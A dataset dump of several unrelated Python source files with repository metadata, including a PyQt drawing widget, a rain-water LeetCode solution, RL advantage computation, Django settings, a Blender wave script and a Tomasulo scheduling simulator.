def __init__(self):
super().__init__()
uic.loadUi('Ul.ui', self)
self.do_paint = False
self.pushButton.clicked.connect(self.paint)
self.l = []
def paintEvent(self, event):
if self.do_paint:
self.qp = QPainter()
self.qp.begin(self)
self.draw_flag(self.qp)
self.qp.end()
def paint(self):
self.do_paint = True
self.repaint()
def draw_flag(self, qp):
d = random.randint(30, 200)
x = random.randint(50, 600)
y = random.randint(50, 600)
self.qp.setBrush(QColor(255, 255, 0))
self.l.append([x, y, d])
for i in self.l:
self.qp.drawEllipse(i[0], i[1], i[2], i[2])
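    # Note: each click appends one circle spec [x, y, d] to self.l and the paint
    # handler redraws the whole list, so earlier circles persist on screen.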
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = round()
ex.show()
sys.exit(app.exec()) | [
"[email protected]"
] | |
e20c38956babc6cbe3d1fc1963db34935844d010 | ed37c6acf35ad8dfa7064c7d304f046c3657cb7a | /leetcode/42_trapping_rain_water/solution.py | ae3f4855ee9795dcf6865c1ad42e29e0f6858bfd | [] | no_license | etture/algorithms_practice | 7b73753f5d579b7007ddd79f9a73165433d79b13 | ba398a040d2551b34f504ae1ce795e8cd5937dcc | refs/heads/master | 2021-11-18T20:37:11.730912 | 2021-10-03T23:25:24 | 2021-10-03T23:25:24 | 190,863,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,029 | py | # Basic imports --------------------------------------------
from __future__ import annotations
from typing import List  # needed for the List[int] annotation below
import sys
# Python's default recursion limit is said to be 1000 --> raise it manually to 10^6
sys.setrecursionlimit(10**6)
from os.path import dirname, abspath, basename, normpath
root = abspath(__file__)
while basename(normpath(root)) != 'algo_practice':
root = dirname(root)
sys.path.append(root)
from utils.Tester import Tester, Logger
logger = Logger(verbose=False)
import pprint
pp = pprint.PrettyPrinter()
# ----------------------------------------------------------
class Solution:
def trap(self, height: List[int]) -> int:
forward_max, backward_max = list(), list()
forward_prev, backward_prev = 0, 0
for h in height:
if h > forward_prev:
forward_prev = h
forward_max.append(forward_prev)
for h in height[::-1]:
if h > backward_prev:
backward_prev = h
backward_max.append(backward_prev)
backward_max = backward_max[::-1]
# print(f'forward: {forward_max}')
# print(f'backward: {backward_max}')
minimums = [forward_max[x] if forward_max[x] < backward_max[x] else backward_max[x] for x in range(len(height))]
# print(f'minimums: {minimums}')
rainwater = [minimums[x] - height[x] for x in range(len(height))]
return sum(rainwater)
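        # Complexity note: O(n) time and O(n) extra space for the prefix/suffix
        # maxima; a two-pointer variant can cut the extra space to O(1).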
if __name__ == '__main__':
sol = Solution()
test_cases = [
([[0,1,0,2,1,0,1,3,2,1,2,1]], 6),
([[4,2,0,3,2,5]], 9),
([[1,2,3,2,1]], 0),
([[3,2,1,2,3]], 4),
([[3,2,1,1,3]], 5),
([[1,3,5,2,1,3,1,6,1,2]], 14),
]
Tester.factory(test_cases, func=lambda input: sol.trap(*input)).run(unordered_output=False)
| [
"[email protected]"
] | |
03ffb80aa1cacd9b233a302fd7ca8876997f5fb0 | c016ed237862591c42fd00b973fced791247be37 | /src/garage/tf/_functions.py | 796fd5150cfecf418dec46dbd9d005ecb98446c7 | [
"MIT"
] | permissive | thanhkaist/garage | 726766a1e6fd465f776c42dc006f331a3b98cbd7 | 1d840df357282a675b8fce839bb0e5f72a8abba9 | refs/heads/master | 2022-11-05T23:40:08.057025 | 2020-06-21T16:59:15 | 2020-06-21T16:59:15 | 274,142,146 | 1 | 0 | MIT | 2020-06-22T13:18:14 | 2020-06-22T13:18:13 | null | UTF-8 | Python | false | false | 3,400 | py | """Utility functions for tf-based Reinforcement learning algorithms."""
import numpy as np
from garage.misc import tensor_utils as np_tensor_utils
from garage.tf.misc import tensor_utils
def paths_to_tensors(paths, max_path_length, baseline_predictions, discount,
gae_lambda):
"""Return processed sample data based on the collected paths.
Args:
paths (list[dict]): A list of collected paths.
max_path_length (int): Maximum length of a single rollout.
baseline_predictions(numpy.ndarray): : Predicted value of GAE
(Generalized Advantage Estimation) Baseline.
discount (float): Environment reward discount.
gae_lambda (float): Lambda used for generalized advantage
estimation.
Returns:
dict: Processed sample data, with key
* observations: (numpy.ndarray)
* actions: (numpy.ndarray)
* rewards: (numpy.ndarray)
* baselines: (numpy.ndarray)
* returns: (numpy.ndarray)
* valids: (numpy.ndarray)
* agent_infos: (dict)
* env_infos: (dict)
* paths: (list[dict])
"""
baselines = []
returns = []
total_steps = 0
for idx, path in enumerate(paths):
total_steps += len(path['rewards'])
path_baselines = np.append(baseline_predictions[idx], 0)
deltas = (path['rewards'] + discount * path_baselines[1:] -
path_baselines[:-1])
path['advantages'] = np_tensor_utils.discount_cumsum(
deltas, discount * gae_lambda)
path['deltas'] = deltas
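        # This is Generalized Advantage Estimation: A_t = sum_l (gamma*lambda)^l * delta_{t+l},
        # computed as a discounted cumulative sum over the TD residuals in `deltas`.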
for idx, path in enumerate(paths):
# baselines
path['baselines'] = baseline_predictions[idx]
baselines.append(path['baselines'])
# returns
path['returns'] = np_tensor_utils.discount_cumsum(
path['rewards'], discount)
returns.append(path['returns'])
# make all paths the same length
obs = [path['observations'] for path in paths]
obs = tensor_utils.pad_tensor_n(obs, max_path_length)
actions = [path['actions'] for path in paths]
actions = tensor_utils.pad_tensor_n(actions, max_path_length)
rewards = [path['rewards'] for path in paths]
rewards = tensor_utils.pad_tensor_n(rewards, max_path_length)
returns = [path['returns'] for path in paths]
returns = tensor_utils.pad_tensor_n(returns, max_path_length)
baselines = tensor_utils.pad_tensor_n(baselines, max_path_length)
agent_infos = [path['agent_infos'] for path in paths]
agent_infos = tensor_utils.stack_tensor_dict_list([
tensor_utils.pad_tensor_dict(p, max_path_length) for p in agent_infos
])
env_infos = [path['env_infos'] for path in paths]
env_infos = tensor_utils.stack_tensor_dict_list(
[tensor_utils.pad_tensor_dict(p, max_path_length) for p in env_infos])
valids = [np.ones_like(path['returns']) for path in paths]
valids = tensor_utils.pad_tensor_n(valids, max_path_length)
lengths = np.asarray([v.sum() for v in valids])
samples_data = dict(
observations=obs,
actions=actions,
rewards=rewards,
baselines=baselines,
returns=returns,
valids=valids,
lengths=lengths,
agent_infos=agent_infos,
env_infos=env_infos,
paths=paths,
)
return samples_data
| [
"[email protected]"
] | |
fffa5c425542a1e1841cdb3d6a99d19c9c3b253b | d8740499280fc4ccf6f7f4994fab459ed5d73655 | /src/example6.py | 7adc1c5321a0973ab2bc80dff8d4934edcbec907 | [] | no_license | shadow-robot/ros-workshop | 5c088f78cb66c93ee90ad28aa43f0364b7d39038 | e101dcbcc36a6973af436f644055dcf112e87159 | refs/heads/master | 2021-01-19T11:15:48.309312 | 2013-09-10T07:46:13 | 2013-09-10T07:46:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,013 | py | #!/usr/bin/env python
'''
@file example1.py
@author Ugo Cupcic <[email protected]>
Copyright (c) 2013 Shadow Robot Company Ltd.
All rights reserved.
This code is proprietary and may not be used, copied, distributed without
prior authorisation and agreement from Shadow Robot Company Ltd.
@brief
'''
#importing the package dependencies - always necessary, use package name
import roslib; roslib.load_manifest("ros_workshop")
import rospy
#importing service
from ros_workshop.srv import Test, TestRequest
class Service(object):
"""
"""
def __init__(self, ):
"""
"""
self.service_ = rospy.ServiceProxy("/test5/service", Test)
def call_srv(self, string):
req = TestRequest()
req.input = string
result = self.service_.call(req)
print "Service returned: ", result.output
rospy.init_node("test6")
service = Service()
user_msg = raw_input("Enter some text to send to the service server: ")
service.call_srv(user_msg)
| [
"[email protected]"
] | |
11b28e9d82f1a02507a3691d244e72b7c4236085 | ee974d693ca4c4156121f8cb385328b52eaac07c | /env/lib/python3.6/site-packages/sklearn/externals/joblib/func_inspect.py | acc828b11737c3a6dbc31c469ac00390593e4ea7 | [] | no_license | ngonhi/Attendance_Check_System_with_Face_Recognition | f4531cc4dee565d0e45c02217f73f3eda412b414 | 92ff88cbc0c740ad48e149033efd38137c9be88d | refs/heads/main | 2023-03-12T07:03:25.302649 | 2021-02-26T15:37:33 | 2021-02-26T15:37:33 | 341,493,686 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:db6f68dd571d6f69eee017246e4855f4f652345307fe58e13ac7c132f6e1052f
size 13773
| [
"Nqk180998!"
] | Nqk180998! |
db2ef15c79a0ad3ecce1ba0746e4235a7c432441 | 958a80acfedd6ee11320889c70fc53384e362a55 | /create_waves.py | 2f1745b58b3f6d5852662423752a2c39e10d74ec | [] | no_license | nekech/blender-water-scripts | b1620a547dde8f93da4234b5bc3c9f910d6efbb3 | 5694d3324b4aaa485023fc3ccee301e44a2e6c8f | refs/heads/master | 2020-03-08T06:13:33.869149 | 2018-04-06T07:52:09 | 2018-04-06T07:52:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | import bpy
import bmesh
from math import sin  # getWaveHeight() below calls sin(); pow() is a builtin
obj = bpy.context.edit_object
me = obj.data
bm = bmesh.from_edit_mesh(me)
bm.faces.active = None
def scalar(a, b):
return a[0]*b[0] + a[1]*b[1]
def getWaveHeight(pos, dir, steepness=1, amplitude=1, velocity=1, wavelength=1, t=1):
fi = velocity * (2 * 3.14 / wavelength)
s = scalar(pos, dir) * (2 * 3.14 / wavelength) + t * fi
waveZ = (sin(s) + 1.0) / 2.0
waveZ = pow(waveZ, steepness)
waveZ = waveZ*amplitude
return waveZ
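# Note: this implements a simple directional sine wave; scalar(pos, dir) projects
# the vertex onto the wave direction, and `steepness` sharpens the crests by
# raising the normalised sine to a power before scaling by `amplitude`.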
for v in bm.verts:
if v.select:
v.co.z = getWaveHeight([v.co.x, v.co.y], [0, 1], amplitude=0.2, wavelength=(3.14/10.0))
v.co.z += getWaveHeight([v.co.x, v.co.y], [1, 0], amplitude=0.4, wavelength=(3.14/10.0))
#Tip: you can add more waves here; using about 4 waves is recommended.
bmesh.update_edit_mesh(me, True)
| [
"[email protected]"
] | |
e4d11405844fc9dc09f679cf620d2da21493dfec | fa508cb53f41b51b4a3632c4322d97e1b25cfefc | /src/sensor_api/sensor_api/settings.py | 56faeb817eacddac40d6b3a2cbcbabb022a25c2e | [] | no_license | Nishant173/sensor-data-assignment | b4bc1b21c1ae1528dfde1bf8c70e974d3eb0df53 | 08998ce887fb8a37bf1fbb2932c7d009affdd506 | refs/heads/main | 2023-01-21T07:50:43.953785 | 2020-12-02T06:22:30 | 2020-12-02T06:22:30 | 315,087,803 | 0 | 0 | null | 2020-11-25T14:01:23 | 2020-11-22T16:59:37 | Python | UTF-8 | Python | false | false | 3,123 | py | """
Django settings for sensor_api project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'kq_s1mom%-g&12bds0dzwji^569cq0qde5y!gwhnb4gs88sj7#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'api.apps.ApiConfig',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'sensor_api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'sensor_api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
29698006b4599587d123c8ce7290cb3c2b0386b8 | 0c4c749f863c176b3a788c0b0e65117eb0530547 | /readinput.py | a7a28bcf9bc3a769554c7da305a806f85f6cb485 | [
"Apache-2.0"
] | permissive | pankajcoding/TAS | a55e422e1d936ce503048c8e05e1eaa8905af781 | 3acee6afbda489f5c188b67d4ab7924f6c1a0e84 | refs/heads/master | 2020-05-02T20:58:30.593382 | 2019-04-01T11:34:41 | 2019-04-01T11:34:41 | 178,206,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,983 | py | class Instruction:
def __init__(self,op,destreg,sreg1,sreg2):
self.op=op
self.destreg=destreg
self.sreg1=sreg1
self.sreg2=sreg2
class ReservationStation:
def __init__(self,id,busy=1,op=-1,vj=None,vk=None,qj=-1,qk=-1,disp=0):
self.id=id
self.busy=busy
self.op=op
self.vj=vj
self.vk=vk
self.qj=qj
self.qk=qk
self.disp=disp
def dispatch(self):
self.disp=1
def clear(self):
self.busy=0
self.op=-1
self.vj=None
self.vk=None
self.qj=-1
self.qk=-1
self.disp=0
def __str__(self):
return 'RS'+str(self.id)+' '+str(self.busy)+' '+str(self.op)+' '+str(self.vj)+' '+str(self.vk)+' '+str(self.qj)+' '+str(self.qk)+' '+str(self.disp)
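# Opcode convention used throughout this file (see printInstructions below):
# 0 = ADD, 1 = SUB, 2 = MUL, 3 = DIV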
class ExecutionUnit:
def __init__(self):
self.busy=0
self.currentRS=None
self.executionStarted=None
# self.destinationRS=None
self.remainingcycles=None
self.op=None
self.arg1=None
self.arg2=None
    def clear(self):
        self.busy=0
        self.currentRS=None
        self.executionStarted=None
        self.remainingcycles=None
        self.op=None
        self.arg1=None
        self.arg2=None
def isRSAvailable(opcode):
if (opcode==0 or opcode==1):
#check if add RS is available
if RS[0].busy==0:
#assign instr to rs0
return 0
elif RS[1].busy==0:
return 1
elif RS[2].busy==0:
return 2
else:
# reservation station is not available do not issue instr
return -1
elif (opcode==2 or opcode==3):
#check is multiply RS available
if RS[3].busy==0:
#assign instr to rs0
return 3
elif RS[4].busy==0:
return 4
else:
return -1
def isExecutionUnitFree(op):
if(op==1 or op==0):
return not addExecutionUnit.busy
elif(op==2 or op==3):
return not multExecutionUnit.busy
else:
print('invalid code')
def assignExecutionStation(reservationS,i,cycle):
if (reservationS.op==1 or reservationS.op==0):
addExecutionUnit.busy=1
addExecutionUnit.currentRS=i
addExecutionUnit.executionStarted=cycle+1
addExecutionUnit.op=reservationS.op
addExecutionUnit.arg1=reservationS.vj
addExecutionUnit.arg2=reservationS.vk
return
elif(reservationS.op==2):
multExecutionUnit.busy=1
multExecutionUnit.currentRS=i
multExecutionUnit.executionStarted=cycle+1
multExecutionUnit.op=reservationS.op
multExecutionUnit.arg1=reservationS.vj
multExecutionUnit.arg2=reservationS.vk
return
elif(reservationS.op==3):
multExecutionUnit.busy=1
multExecutionUnit.currentRS=i
multExecutionUnit.remainingcycles=40
multExecutionUnit.executionStarted=cycle+1
multExecutionUnit.op=reservationS.op
multExecutionUnit.arg1=reservationS.vj
multExecutionUnit.arg2=reservationS.vk
return
def writeBack():
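    # Latency model: ADD/SUB results broadcast 2 cycles after execution starts,
    # MUL after 10 cycles, DIV after 40 (the executionStarted + N checks below).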
#do write back
if addExecutionUnit.busy==1:
if (currentCycle== addExecutionUnit.executionStarted+2):
currentRS=addExecutionUnit.currentRS
if(addExecutionUnit.op==0):
result=addExecutionUnit.arg1+ addExecutionUnit.arg2
else:
result=addExecutionUnit.arg1-addExecutionUnit.arg2
for i in range(len(RAT)):
if(RAT[i]== currentRS):
RF[i]= result
RAT[i]=None
for i in range(len(RS)):
if(RS[i].qk==currentRS):
RS[i].vk=result
RS[i].qk=-1
if(RS[i].qj==currentRS):
RS[i].vj=result
RS[i].qj=-1
RS[currentRS].clear()
addExecutionUnit.clear()
if multExecutionUnit.busy==1:
if (multExecutionUnit.op==2 and currentCycle== (multExecutionUnit.executionStarted+10)):
currentRS=multExecutionUnit.currentRS
result=multExecutionUnit.arg1* multExecutionUnit.arg2
for i in range(len(RAT)):
if(RAT[i]== currentRS):
RF[i]= result
RAT[i]=None
for i in range(len(RS)):
if(RS[i].qk==currentRS):
RS[i].vk=result
RS[i].qk=-1
if(RS[i].qj==currentRS):
RS[i].vj=result
RS[i].qj=-1
RS[currentRS].clear()
multExecutionUnit.clear()
elif (multExecutionUnit.op==3 and currentCycle== (multExecutionUnit.executionStarted+40)):
currentRS=multExecutionUnit.currentRS
result=multExecutionUnit.arg1/ multExecutionUnit.arg2
for i in range(len(RAT)):
if(RAT[i]== currentRS):
RF[i]= result
RAT[i]=None
for i in range(len(RS)):
if(RS[i].qk==currentRS):
RS[i].vk=result
RS[i].qk=-1
if(RS[i].qj==currentRS):
RS[i].vj=result
RS[i].qj=-1
RS[currentRS].clear()
multExecutionUnit.clear()
# print('division done result is ',result)
def simulateCycle():
global currentCycle
#1. issue
if len(instrList)>0:
freestation=isRSAvailable(instrList[0].op)
if(freestation!=-1):
#issue the instr
instr=instrList.pop(0)
RS[freestation].busy=1
RS[freestation].op=instr.op
            #first source register
            if(RAT[instr.sreg1]==None):
                #operand ready: read its value from the register file
                RS[freestation].vj=RF[instr.sreg1]
            else:
                #operand still pending: record the producing reservation station id from the RAT
                RS[freestation].qj=RAT[instr.sreg1]
            #second source register
            if(RAT[instr.sreg2]==None):
                #operand ready: read its value from the register file
                RS[freestation].vk=RF[instr.sreg2]
            else:
                #operand still pending: record the producing reservation station id from the RAT
                RS[freestation].qk=RAT[instr.sreg2]
RAT[instr.destreg]=freestation
else:
# RS is not available do nothing
pass
#2 dispatch
# see if among RS their is any station with both ready values
for i in range(len(RS)):
if(RS[i].busy==1 and RS[i].disp==0):
if(RS[i].vj!=None and RS[i].vk!=None):
if(isExecutionUnitFree(RS[i].op)==1):
RS[i].disp=1
assignExecutionStation(RS[i],i,currentCycle)
#3 execute
#4 writeback
writeBack()
currentCycle+=1
def printReservationStation(RS):
print('\nReservation Stations')
print('RS busy op Vj Vk Qj Qk Disp')
for i in range(len(RS)):
print(RS[i])
printRAT(RAT)
def printRAT(RAT):
print('-----------------------------')
print(' ','RF RAT')
for i in range(len(RAT)):
print(i,': ',RF[i],end="")
if(RAT[i]!=None):
print(' RS',RAT[i],sep="")
else:
print('')
def printInstructions():
global instrList
print('-----------------------------')
print('Instruction Queue')
for instr in instrList:
if(instr.op==0):
print("ADD",end=" ")
if(instr.op==1):
print("Sub",end=" ")
if(instr.op==2):
print("Mul",end=" ")
if(instr.op==3):
print("Div",end=" ")
print("R",instr.destreg,", ","R",instr.sreg1,", ","R",instr.sreg2,sep="")
print()
addExecutionUnit=ExecutionUnit()
multExecutionUnit=ExecutionUnit()
currentCycle=1
with open("input.txt","r") as f:
content=f.read().splitlines()
n=int(content[0])
cycles=int(content[1])
instrList=[]
# reading instructions
for i in range(n):
temp = [int(value) for value in content[i+2].split()]
tempInstr=Instruction(temp[0],temp[1],temp[2],temp[3])
instrList.append(tempInstr)
# index i stores Ri register Value
RF=[] #index 0 is empty
for i in range(n+2,n+10):
RF.append(int(content[i]))
RAT=[None]*8
RS=[]
for i in range(5):
temp=ReservationStation(busy=0,id=i,op=-1,vj=None,vk=None,qj=-1,qk=-1,disp=0)
RS.append(temp)
print('After cycle ',cycles)
for i in range(cycles):
simulateCycle()
printReservationStation(RS)
printInstructions()
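# Expected input.txt layout, inferred from the parsing code above (values illustrative):
#   line 1: number of instructions N
#   line 2: number of cycles to simulate
#   next N lines: "op dest src1 src2" per instruction (op: 0=ADD 1=SUB 2=MUL 3=DIV)
#   next 8 lines: initial values of registers R0..R7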
| [
"[email protected]"
] | |
c255cb8d3213b6bc36e417faaae47d76d3f94ba6 | a7e1003a57bea59e4209c36c9e4493686b546c88 | /manga_py/providers/blogtruyen_com.py | 9e2ae01e7e0605f5b9444acad1b0067ebf35a9d9 | [
"MIT"
] | permissive | terepanda/manga-dl | b7de04ea42d64c71689860502895bf0bc274f9a4 | 2ac3a314c2f67ad22f6da7e293ec6b3a132d7834 | refs/heads/stable_1.x | 2020-04-28T09:22:26.055562 | 2019-03-11T16:07:00 | 2019-03-11T16:07:00 | 173,831,799 | 0 | 0 | MIT | 2019-03-04T22:30:24 | 2019-03-04T22:30:24 | null | UTF-8 | Python | false | false | 1,169 | py | from manga_py.provider import Provider
from .helpers.std import Std
class BlogTruyenCom(Provider, Std):
def get_chapter_index(self) -> str:
idx = self.re.search(r'\.com/c(\d+)/', self.chapter)
return '{}-{}'.format(self.chapter_id, idx.group(1))
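    # Example (illustrative URL): for a chapter like https://blogtruyen.com/c12345/...,
    # the regex captures "12345", yielding an index such as "<chapter_id>-12345".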
def get_main_content(self):
url = self._test_main_url(self.get_url())
return self.http_get(self.http().normalize_uri(url))
def _test_main_url(self, url):
if ~url.find('.com/c'):
selector = '.breadcrumbs a + a'
url = self.html_fromstring(url, selector, 0).get('href')
return url
def get_manga_name(self) -> str:
url = self._test_main_url(self.get_url())
return self.re.search(r'/\d+/([^/]+)', url).group(1)
def get_chapters(self):
return self._elements('#list-chapters .title > a')
def get_files(self):
items = self.html_fromstring(self.chapter, '#content img')
return [i.get('src') for i in items]
def get_cover(self) -> str:
return self._cover_from_content('.thumbnail img')
def book_meta(self) -> dict:
# todo meta
pass
main = BlogTruyenCom
| [
"[email protected]"
] | |
319167886dffc046f9ce22266a6bc0400ffc7754 | 49197a748adea1618a2cece7a1ae057006da090c | /jgodwin/diff/SConstruct | 7b12c08a428e67563eadff2e3eb80b8b3403a1b8 | [] | no_license | psava/cwp12 | 0bbb1f213c66737509280fc4b0ac5c53b52d017a | 3f47c1bf358caa5ebe608ab88fc12b85fd489220 | refs/heads/master | 2021-01-10T21:24:57.572992 | 2012-10-10T15:52:18 | 2012-10-10T15:52:18 | 2,213,082 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 273 | from rsf.proj import *
import fdutil
import acousticfd as fd
par = dict(
nx=601,ox=0.0,dx=10.0,
nz=401,oz=0.0,dz=10.0,
nt=1501,ot=0.0,dt=0.002,kt=100,freq=25
)
fdpar = fdutil.defaults(nb=50,**par)
fdutil.constant2d('vel',2000,**par)
Flow('den',
'''
| [
"[email protected]"
] | ||
594d55a79cd1cf6b6b9519c922596c329b7cfe99 | 1125e5999b20df75ef18e6780154ed2ea1e3ea26 | /src/miniserver/routes.py | 3ac633f978c7cfb7ffa26f176c314933a6f4cf11 | [] | no_license | fabiommendes/miniserver | 426593b2204dc2d12a944f361b3285f055157b18 | 0b82263ff01716583e110d0bfee506363f4f047a | refs/heads/master | 2021-01-23T06:15:11.264330 | 2017-03-27T14:45:43 | 2017-03-27T14:45:43 | 86,347,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,574 | py | import warnings
import re
from collections import OrderedDict
from functools import singledispatch
import functools
ROUTES = OrderedDict()
DEFAULT_PAGE_NAMES = {'index': ''}
def route(url=None, **kwargs):
"""
Decorator that defines a route in your web page.
"""
if callable(url) and url.__name__ in DEFAULT_PAGE_NAMES:
return route(DEFAULT_PAGE_NAMES[url.__name__], **kwargs)(url)
elif callable(url):
return route(url.__name__, **kwargs)(url)
def decorator(func):
url_route = func.__name__ if url is None else url.lstrip('/')
if url_route in ROUTES:
warnings.warn('duplicate route: %r' % url)
else:
ROUTES[url_route] = wrapped_view(func, **kwargs)
return func
return decorator
def regex_escape(st):
    # escape regex metacharacters in the literal parts of a route
    return re.escape(st)
def regex_from_route(route):
"""
Convert a route string in the form part1/part2/{varname}/ to a Django url
regex.
"""
regex, tail = '', route
while tail:
pre, sep, tail = tail.partition('{')
regex += regex_escape(pre)
if sep:
varname, sep, tail = tail.partition('}')
if not sep:
                raise ValueError('brackets in route string do not match: %r' % route)
regex += r'(?P<%s>[^\/]*)' % varname
return regex
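# Example (illustrative): regex_from_route('posts/{slug}/') produces roughly
# r'posts/(?P<slug>[^\/]*)/' once the literal parts pass through regex_escape.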
def make_url_patterns():
"""
Return a list of url_patterns from the registered routes.
"""
from django.conf.urls import url
# Index is handled differently.
routes = dict(ROUTES)
routes.pop('', None)
result = []
for route, view in routes.items():
result.append(url(regex_from_route(route), view))
return result
def update_context(context):
import miniserver
context.setdefault('settings', miniserver.settings)
def render(request, template, context=None, **kwargs):
from django.shortcuts import render
context = dict(context or {}, **kwargs)
update_context(context)
return render(request, template, context)
@singledispatch
def wrap_to_request(data, request, template='base.html'):
return render(request, template, {'body': data})
@wrap_to_request.register(dict)
def _(data, request, template='base.html'):
return render(request, template, data)
def wrapped_view(view, **kwargs):
"""
Wraps a miniserver view function in a Django-compatible view function.
"""
@functools.wraps(view)
def django_view(request, **dj_kwargs):
kwargs['request'] = request
return wrap_to_request(view(**dj_kwargs), **kwargs)
return django_view | [
"[email protected]"
] | |
1110a852257efa822e45b22417016e5fbcfa0ea7 | abefff4117482aed495b2c17bc0d3cc5a178fcc7 | /ReleaseBuilds/Linux/resources/maps/Generate/checks.py | 450f60723fb2a9697187d839cabb0e3861102809 | [] | no_license | blazingkin/gamejam-2020 | f2163d1d03ddae7c4bc65f25dd1211e9173a6e6d | 0bb8025bb03dc92c4d1a599049c5008f8a67e92f | refs/heads/master | 2022-08-04T05:27:41.263512 | 2020-05-25T01:13:32 | 2020-05-25T01:13:32 | 266,653,642 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 622 | py | def checkBlack(r, g, b, a):
if (r == 0 and b == 0 and g == 0 and a == 255):
return True
return False
def checkWhite(r, g, b, a):
if (r == 255 and b == 255 and g == 255 and a == 255):
return True
return False
def checkBlue(r, g, b, a):
if (r == 0 and b == 255 and g == 0 and a == 255):
return True
return False
def checkGreen(r, g, b, a):
if (r == 0 and b == 0 and g == 255 and a == 255):
return True
return False
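# A compact equivalent of these colour checks (sketch, same argument order r, g, b, a):
#   def check_colour(r, g, b, a, target):
#       return (r, g, b, a) == (*target, 255)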
def checkRed(r, g, b, a):
if (r == 255 and b == 0 and g == 0 and a == 255):
return True
return False
| [
"[email protected]"
] | |
1e4a51bf9b32795d916f228d5b11336efe9b2520 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_2/ndxthr005/question3.py | 110544217c857301086e741cfc1f0e2b7ba094fb | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 309 | py | #thrianka naidoo
#ndxthr005
#question3
import math
x=0
y=2
z=2
while x!=2:
x=math.sqrt(2+x)
z=z*(y/x)
print("Approximation of pi: ", round(z,3),sep='')
radius=eval(input("Enter the radius: \n"))
a=z * (radius**2)
print("Area: ",round(a,3),sep='')
| [
"[email protected]"
] | |
7dac095e246f04b16e09db800a5c43df285578fc | 51240868244b76ae9208d05483550a3ae3cdeabc | /config.py | e60d3ddad5ef9fe8d63e0092d59a33186902b439 | [
"MIT"
] | permissive | annechege/Online-event | 396401c66fd087f3ace64d15ef645e4357168004 | 3ea69e416550171cbb86279674412eee3d171f6d | refs/heads/master | 2023-06-01T12:27:43.146440 | 2021-06-24T17:11:00 | 2021-06-24T17:11:00 | 379,850,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | import os
class Config:
API_KEY=os.environ.get("API_KEY")
NEWS_API_BASE_URL='https://newsapi.org/v2/sources?country=us&category={}&apiKey={}'
NEWS_ARTICLES_APL_URL='https://newsapi.org/v2/everything?q={}&apiKey={}'
    SOURCE_ARTICLES_URL='https://newsapi.org/v2/everything?sources={}&apiKey={}'  # second {} was missing; added so the key can be formatted in like the URLs above
class DevConfig(Config):
DEBUG = True
config_options = {
'development':DevConfig
} | [
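# Typical consumption pattern (hypothetical Flask app factory):
#   app.config.from_object(config_options['development'])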
"[email protected]"
] | |
cc819f12b3cba1ace7ecccad91aac01edc8bd75f | 13b02ce7a295f2d05ebe6dfde1af4a4910c0c97e | /Scripts/dataset_statistics.py | 07200b74cfc21baec99bda397ed5693b74f2f595 | [] | no_license | mohankumargupta/University-Project | 1cd00cc121f13f1c4614b0de9500c1899fa8b19f | 1c011ca2cae8371dfeb0bb7aa2c92ec24f2e2789 | refs/heads/master | 2021-01-12T09:44:38.543088 | 2014-04-03T10:07:21 | 2014-04-03T10:07:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,214 | py | from collections import Counter
